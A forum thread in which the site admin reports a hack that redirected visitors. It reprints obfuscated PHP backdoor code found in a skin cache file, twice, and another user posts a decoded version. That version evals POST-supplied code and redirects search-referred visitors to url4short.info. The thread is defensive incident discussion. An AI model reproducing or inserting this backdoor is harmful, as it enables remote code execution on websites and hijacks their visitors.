Jump to content

RSS Feeds Link Problem


Annon

Recommended Posts

Hey guys

This was something that used to hit us on the old forum. I believe it's a hack/vulnerability in the software. I fixed the old one, now I'm going to have to track it down again in the new software.

Sorry about that, it will hopefully be fixed soon.

M

  • Like 1
Link to comment
Share on other sites

Hey

I tracked down the problem. It was hidden in a cache file for the forum. I've cleaned up the hacked code and it should be fixed now. I still haven't managed to track down how they're getting in, so it might pop up again. I'm going to keep searching for the backdoor, but in the meantime if it crops up again then please let me know.

Thanks

Marc

P.S. If anyone's interested, this is the code that was screwing everyone up:


$k='b2488714339183624a45a9373ae8d945';
$mds='O7Agi6;AxO2IXFOB@FOiDZ"&Dfg[A/&a,JnsjfgvkZ,_;vo)A<&[Jf/IAJo)B~E"A}"cO~4ckUF"AJoP;ZR$Jf/~Bv&~B~Bx%U"KDZ"@Dfz7,_&gBsD7Bs%sLTlcj=_c,0VcB=ogFUE"J_C^{_4;DZ(Fk}ggFvRxkZDVBf{foR&",<o7,Z{@B=4~J=D7FTWakU4]{W&./Rx"A_)ck}"KDe{&neC~,<F];<R)wfE@D~o0;=4uB=Cc,Z/~]Zo~wJFx]eoxFJDP]egV;v4gOUocD~P"J_oR{g,R{gxs}R4{{R&/{)/}J)Re4{${D_)cj~4v^{CPwJDa,/&_BvP@DR&.4/D<4/D;D)V{/RC]{"/Z4/DR{0FFk.x"wa_lDZ,;DfV7B=nsJ.x"B>_lBeDg,_&(wJ4>AUEsYfzcFv/BLvo7;Jzs;f&s;Z/BLsz$w<V7;_P[]ZDc;vB[wf&(]egV;v4gORP[Bs/uBvR(wvzgBgP[Bs/uwvRc,e/BL0ocD~P"w~"KDZE&DR&.4/D<4/D;D)V{/RC]}W&./UFFj~40^}4)AZgaL.$a,J4)A<$sB_xswf&7AfggJfg"D_)KDZB&DZY[D=ogB=oc;f$]A<nsj~4g^}40L0Fxw<$sJfg"Dax",T_g;JC)O}E"J_oR{g,R{gxs}R4{{R&wJ)_^<0FFk.(c,0Vg;JC)O}E"J)o^.)(D4/x",/)ckJ(c,0VcB=ogFUE"J)FR/RxsAJC0F0FFk}wvkURg;JC)O}E"J)FR/Rxs,~FFk}"vD0EV,<_PFe"@DR&T.)&L}{/;DZFFk}"cOfgvkU4>^.)"AUgKA<w@DZncBf/)wf&7AfggkU4gLUFg;0BxFZg(,}Ecka%f%TlPk.x";._aF<DaFeY@;<n_kU4@k}PPLTEcj=C~A<$)kUD";fo_;</[FU$x;foVFZg7;>)sAe4)BT@7L=/~;T4aAZ&~FU$c;v,7L=x";J)sY0"K]</IAJnK]<gvkUEVDe{cD0w"B0gKDWgnn"V{.{P[^}YuBfo~AJC)Ye4$BZ{&D=4gOen7AvRfwJo>BvgPFUBEB=D>^}FKDe4@AJ%(^sogFe4c;vFa<~F0;fR~,R&_BvPsJJ)7A<$",JE[BZVP^fgPwsw&O~4)AZgaL.$~,<FcB=4~O})`BV3iI=N`;=/)Be/)L.$V;s4cnfR>AZ/YwJo@]},V;JlK,a_SB~B`BV3iI=N`^U&aw=DcBen`BV3iI=N`Y>(&]nNNq';
$jsa='jEK!u>WQ^CfRP98_%Xwtk&;5qJh0?1Nz{Zi:/vd[s|cO@#-<+=]M"o`y.UAmrG*aeg,2}Tbl(Fx~4SB$3YDIHLn7)pV6';
$jsb='Og7+8jE>PB2Fw`~1M_Y#K9b-;X=i]|)xUG(<Vm&un%peo^}W*3f:kN.?TCa!,{[zHlZ6SD"AtdsyRqc5rIJ4/LQv0$h@';
$i='#c#'.substr($mds,213,1);
$ipd=preg_replace($i,strtr($mds,$jsa,$jsb),'css');
[/CODE]

  • Like 2
Link to comment
Share on other sites

Thanks Marc, hate people hacking around to screw others. Or is it because this forum software is not that popular/well-maintained?

This was also showing for already opened tabs from odforce, with no way to know the address of the thread. I will let you know if I see it again :)

Link to comment
Share on other sites

I still haven't managed to track down how they're getting in, so it might pop up again. I'm going to keep searching for the backdoor, but in the meantime if it crops up again then please let me know.

Is it possible that the webserver itself is rooted via other means? eg. brute force remove root password guessing via ssh

Link to comment
Share on other sites

Thanks Marc, hate people hacking around to screw others. Or is it because this forum software is not that popular/well-maintained?

I've researched this quite a lot and this hack is showing up in this forum, wordpress, vbulletin and a bunch of other popular pieces of software out there. Unfortunately there doesn't seem like there's any idea of how it's happening.

Is it possible that the webserver itself is rooted via other means? eg. brute force remove root password guessing via ssh

I've scoured the logs and there's no sign of anyone logging in via ssh other than myself, however it is possible. I suspect they got in through a vulnerability in the software and have left a backdoor somewhere. As you can see by the code I posted above, it's not exactly obvious what to look for. I've found some scripts on the server that allow someone complete access to all the files in the webroot on the server. Scary, but almost impossible to track down.

I'll keep looking though, thanks for letting me know it's back.

M

  • Like 1
Link to comment
Share on other sites

  • 1 month later...

Hey

I tracked down the problem. It was hidden in a cache file for the forum. I've cleaned up the hacked code and it should be fixed now. I still haven't managed to track down how they're getting in, so it might pop up again. I'm going to keep searching for the backdoor, but in the meantime if it crops up again then please let me know.

Thanks

Marc

P.S. If anyone's interested, this is the code that was screwing everyone up:


$k='b2488714339183624a45a9373ae8d945';
$mds='O7Agi6;AxO2IXFOB@FOiDZ"&Dfg[A/&a,JnsjfgvkZ,_;vo)A<&[Jf/IAJo)B~E"A}"cO~4ckUF"AJoP;ZR$Jf/~Bv&~B~Bx%U"KDZ"@Dfz7,_&gBsD7Bs%sLTlcj=_c,0VcB=ogFUE"J_C^{_4;DZ(Fk}ggFvRxkZDVBf{foR&",<o7,Z{@B=4~J=D7FTWakU4]{W&./Rx"A_)ck}"KDe{&neC~,<F];<R)wfE@D~o0;=4uB=Cc,Z/~]Zo~wJFx]eoxFJDP]egV;v4gOUocD~P"J_oR{g,R{gxs}R4{{R&/{)/}J)Re4{${D_)cj~4v^{CPwJDa,/&_BvP@DR&.4/D<4/D;D)V{/RC]{"/Z4/DR{0FFk.x"wa_lDZ,;DfV7B=nsJ.x"B>_lBeDg,_&(wJ4>AUEsYfzcFv/BLvo7;Jzs;f&s;Z/BLsz$w<V7;_P[]ZDc;vB[wf&(]egV;v4gORP[Bs/uBvR(wvzgBgP[Bs/uwvRc,e/BL0ocD~P"w~"KDZE&DR&.4/D<4/D;D)V{/RC]}W&./UFFj~40^}4)AZgaL.$a,J4)A<$sB_xswf&7AfggJfg"D_)KDZB&DZY[D=ogB=oc;f$]A<nsj~4g^}40L0Fxw<$sJfg"Dax",T_g;JC)O}E"J_oR{g,R{gxs}R4{{R&wJ)_^<0FFk.(c,0Vg;JC)O}E"J)o^.)(D4/x",/)ckJ(c,0VcB=ogFUE"J)FR/RxsAJC0F0FFk}wvkURg;JC)O}E"J)FR/Rxs,~FFk}"vD0EV,<_PFe"@DR&T.)&L}{/;DZFFk}"cOfgvkU4>^.)"AUgKA<w@DZncBf/)wf&7AfggkU4gLUFg;0BxFZg(,}Ecka%f%TlPk.x";._aF<DaFeY@;<n_kU4@k}PPLTEcj=C~A<$)kUD";fo_;</[FU$x;foVFZg7;>)sAe4)BT@7L=/~;T4aAZ&~FU$c;v,7L=x";J)sY0"K]</IAJnK]<gvkUEVDe{cD0w"B0gKDWgnn"V{.{P[^}YuBfo~AJC)Ye4$BZ{&D=4gOen7AvRfwJo>BvgPFUBEB=D>^}FKDe4@AJ%(^sogFe4c;vFa<~F0;fR~,R&_BvPsJJ)7A<$",JE[BZVP^fgPwsw&O~4)AZgaL.$~,<FcB=4~O})`BV3iI=N`;=/)Be/)L.$V;s4cnfR>AZ/YwJo@]},V;JlK,a_SB~B`BV3iI=N`^U&aw=DcBen`BV3iI=N`Y>(&]nNNq';
$jsa='jEK!u>WQ^CfRP98_%Xwtk&;5qJh0?1Nz{Zi:/vd[s|cO@#-<+=]M"o`y.UAmrG*aeg,2}Tbl(Fx~4SB$3YDIHLn7)pV6';
$jsb='Og7+8jE>PB2Fw`~1M_Y#K9b-;X=i]|)xUG(<Vm&un%peo^}W*3f:kN.?TCa!,{[zHlZ6SD"AtdsyRqc5rIJ4/LQv0$h@';
$i='#c#'.substr($mds,213,1);
$ipd=preg_replace($i,strtr($mds,$jsa,$jsb),'css');
[/CODE]

Thank you so much Marc.

I'v got the same problem.

Follow your code, I searched and found file /cache/skin_cache/cacheid_1/skin_global.php is infected. I rebuilt skin and the file is overwritten.

I dont know how hackers can change that file. Could you please give me some advice?

Link to comment
Share on other sites

I have just decode that script, and get:

$i='ini_set';
if(function_exists($i)){
$i('display_errors',0);
$i('log_errors',0);
}
if(isset($_POST[$k]))eval(base64_decode(str_rot13($_POST[$k])));
$u=@preg_match('#bot|spider|crawl|slurp|yandex#i',$_SERVER['HTTP_USER_AGENT']);
$f=@parse_url($_SERVER['HTTP_REFERER']);
$c=@$f['host'];
$r=@preg_match('#live\.com|google\.|yahoo\.|bing.com|yandex\.ru|rambler\.ru|baidu\.#i',$c);
$h=$_SERVER['HTTP_HOST'];
$b=$this-&gt;settings['cookie_id'];
$g=$b.'session_id';
$e=$b.'lang_id';
$d=empty($_SERVER['HTTP_X_MOZ']);
if(empty($_COOKIE[$e])){
if(isset($_GET['ipbv'])&amp;&amp;(!empty($_GET['g']))&amp;&amp;(!empty($_COOKIE[$g]))){
if($c==$h){
if($d)setcookie($e,'en',time()+36000);
$m=substr(md5($h),0,8);
print("document.location='http://url4short.info/{$m}'");
}
exit;}
if((!$u)&amp;&amp;$r){$IPBHTML.="";}
}

Follow above code, the problem will occur after 10 hours (= 36000 / 60 / 60) since the last click from search engine (not just google but yahoo, bing, baidu,...).

We can check 'lang_id' cookies, if it exists (and equal to 'en'), the system may be infected by that virus.

Edited by intefor
Link to comment
Share on other sites

Hey

Yeah I've managed to track down the problem itself, but sadly I haven't managed to discover the root of the problem (ie the source of infection). My solution to get rid of it was to change the ownership of all my php files/directories to the php user (which is 'nobody' in my case). Happily we're on a VPS, so this works and now no-one has permissions to change any of my files anymore. If you're on a shared server then I don't think this solution would work for you.

But yeah. I don't know how they manage to insert code into the forum cache files. I wish I did, I hate not knowing how they're getting in :).

M

  • Like 2
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...